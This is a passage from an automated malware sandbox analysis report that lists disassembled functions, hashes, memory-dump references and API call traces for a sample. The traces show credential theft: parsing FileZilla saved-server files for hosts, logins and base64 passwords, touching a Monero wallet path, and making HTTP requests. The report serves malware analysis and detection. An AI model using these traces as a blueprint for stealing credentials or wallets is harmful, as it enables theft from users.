                        • Opcode Fuzzy Hash: a43d86d1fb8cedc131ed815fa803420f3074802f7b3e70a47caf2eff985819d1
                        • Instruction Fuzzy Hash: FB8207F360C204AFE3046E2DEC8566AF7E9EF94760F1A4A3DE6C4C7744EA3558048796
                        Function 00F31823 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Vy~
                        • API String ID: 0-958377082
                        • Opcode ID: 40aea3346453d6942338c253df8233f178ae36eba1657a83230b6548b213e84b
                        • Instruction ID: 42cd2e8c6d159fc9939caef8a4c21a87f24a72bdc75c14e6382483781008a3eb
                        • Opcode Fuzzy Hash: 40aea3346453d6942338c253df8233f178ae36eba1657a83230b6548b213e84b
                        • Instruction Fuzzy Hash: E1712AB3A0C2048FE3046E69DC9576AFBE6EB84720F1A453DD9C887380EA7558058786
                        Function 00FA4FBB Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: U9U=
                        • API String ID: 0-1770593171
                        • Opcode ID: 75c96a3f5dfa41be12d96537542042a6cf7ad9f25b263199656cbbd7c9bd9ca6
                        • Instruction ID: fe5dfba3e470d6315d18f03a0a181a81d662da908d72044d719b391bccda8c2b
                        • Opcode Fuzzy Hash: 75c96a3f5dfa41be12d96537542042a6cf7ad9f25b263199656cbbd7c9bd9ca6
                        • Instruction Fuzzy Hash: 3851BBB39082145BE3147A69EC557BBBB89CFD0360F2A463DEA4593780FC39590582C6
                        Function 00FB50B2 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: {T3
                        • API String ID: 0-3004263434
                        • Opcode ID: 6f8ac0806012ff2fa1d5468a0cf7fe3d9867315ef39361e12d37e570d51abf75
                        • Instruction ID: 9f7a305a2858b8fd3c9854e7f843006cf64f425cb1c9128a3682931755ebaf50
                        • Opcode Fuzzy Hash: 6f8ac0806012ff2fa1d5468a0cf7fe3d9867315ef39361e12d37e570d51abf75
                        • Instruction Fuzzy Hash: 444156B3D192285BE2446A6DDC057AAB79ADFD9620F1B8A2DDB81C3784FC714D0482C2
                        Function 0100E7B6 Relevance: .7, Instructions: 714COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fac275781602966c5c861d108898073a0baa809a9e453cab0fd05a7393cdcf7f
                        • Instruction ID: 6f4e3738aeeed1c4b6f37e15eee3631dc3cbbbb18574d76f9c7420ed8e013473
                        • Opcode Fuzzy Hash: fac275781602966c5c861d108898073a0baa809a9e453cab0fd05a7393cdcf7f
                        • Instruction Fuzzy Hash: 272217F36083049FE3046E2DEC8567ABBE9EF94720F1A493DE6C4C7744E97698058693
                        Function 0100D370 Relevance: .3, Instructions: 253COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 42df736b932bbd965521c4b9f38a0de624773946133a9f8c6378e87eedbe8ff6
                        • Instruction ID: 9ae4c4bccc49854297310d0d7fc41c291b356236c26592a58636dab229d3a277
                        • Opcode Fuzzy Hash: 42df736b932bbd965521c4b9f38a0de624773946133a9f8c6378e87eedbe8ff6
                        • Instruction Fuzzy Hash: 7671E6B761C6009FE308AE19EC86A7BB7D6EFD4320F1A463DE6C5C3744E93598018796
                        Function 00EB0436 Relevance: .2, Instructions: 226COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9a450f66b0e2ec853c06bfe9f3d25d29636b2e89c1402fd41fb94778ad94d235
                        • Instruction ID: 719738c360915e13b9618b9df7b8b8da82cb850225ba8fabc5d884ce9617f1fe
                        • Opcode Fuzzy Hash: 9a450f66b0e2ec853c06bfe9f3d25d29636b2e89c1402fd41fb94778ad94d235
                        • Instruction Fuzzy Hash: E3715DB3A0C2109BD3046E39EC4577BBBE5DF94720F16893DEAC497784EA3948458693
                        Function 00F0E518 Relevance: .2, Instructions: 155COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 217ee38612bc8932d551a77585906d45f33d7a586eaa03d1ec3f6b31e4ec2a33
                        • Instruction ID: eff05b7974c2f1430a866a05a57692a45caf72158f5eecada10bed203a1dd68a
                        • Opcode Fuzzy Hash: 217ee38612bc8932d551a77585906d45f33d7a586eaa03d1ec3f6b31e4ec2a33
                        • Instruction Fuzzy Hash: 31419DF3E141205BE3085D69EC917BBB6C9DB94731F2A853EE9C1D7384E8749C0182D2
                        Function 00C59750 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        Function 00C50250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C58E0B
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C499EC
                          • Part of subcall function 00C499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C49A11
                          • Part of subcall function 00C499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C49A31
                          • Part of subcall function 00C499C0: ReadFile.KERNEL32(000000FF,?,00000000,00C4148F,00000000), ref: 00C49A5A
                          • Part of subcall function 00C499C0: LocalFree.KERNEL32(00C4148F), ref: 00C49A90
                          • Part of subcall function 00C499C0: CloseHandle.KERNEL32(000000FF), ref: 00C49A9A
                          • Part of subcall function 00C58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C58E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,00C60DBA,00C60DB7,00C60DB6,00C60DB3), ref: 00C50362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C50369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C50385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C50393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C503CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C503DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00C50419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C50427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C50463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C50475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C50502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C5051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C50532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C5054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00C50562
                        • lstrcat.KERNEL32(?,profile: null), ref: 00C50571
                        • lstrcat.KERNEL32(?,url: ), ref: 00C50580
                        • lstrcat.KERNEL32(?,00000000), ref: 00C50593
                        • lstrcat.KERNEL32(?,00C61678), ref: 00C505A2
                        • lstrcat.KERNEL32(?,00000000), ref: 00C505B5
                        • lstrcat.KERNEL32(?,00C6167C), ref: 00C505C4
                        • lstrcat.KERNEL32(?,login: ), ref: 00C505D3
                        • lstrcat.KERNEL32(?,00000000), ref: 00C505E6
                        • lstrcat.KERNEL32(?,00C61688), ref: 00C505F5
                        • lstrcat.KERNEL32(?,password: ), ref: 00C50604
                        • lstrcat.KERNEL32(?,00000000), ref: 00C50617
                        • lstrcat.KERNEL32(?,00C61698), ref: 00C50626
                        • lstrcat.KERNEL32(?,00C6169C), ref: 00C50635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C5068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: facbd5dbed40888f236bf98b941bd6ce9462d13815d0bc1173f8b2321998c80f
                        • Instruction ID: 23b689d6c5d70c500a33f9312289ad2e4d6ee4f2324768d70a318fc0253cc32f
                        • Opcode Fuzzy Hash: facbd5dbed40888f236bf98b941bd6ce9462d13815d0bc1173f8b2321998c80f
                        • Instruction Fuzzy Hash: 70D14E79900108ABDB04EBE1DD96EEE7338FF14302F544529F906B6091EF34AA4DEB65
                        Function 00C45960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C44839
                          • Part of subcall function 00C447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C44849
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C459F8
                        • StrCmpCA.SHLWAPI(?,008A0610), ref: 00C45A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C45B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,008A05F0,00000000,?,0089C018,00000000,?,00C61A1C), ref: 00C45E71
                        • lstrlen.KERNEL32(00000000), ref: 00C45E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C45E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C45E9A
                        • lstrlen.KERNEL32(00000000), ref: 00C45EAF
                        • lstrlen.KERNEL32(00000000), ref: 00C45ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C45EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 00C45F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C45F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00C45F4C
                        • InternetCloseHandle.WININET(00000000), ref: 00C45FB0
                        • InternetCloseHandle.WININET(00000000), ref: 00C45FBD
                        • HttpOpenRequestA.WININET(00000000,008A0720,?,0089FCA0,00000000,00000000,00400100,00000000), ref: 00C45BF8
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • InternetCloseHandle.WININET(00000000), ref: 00C45FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
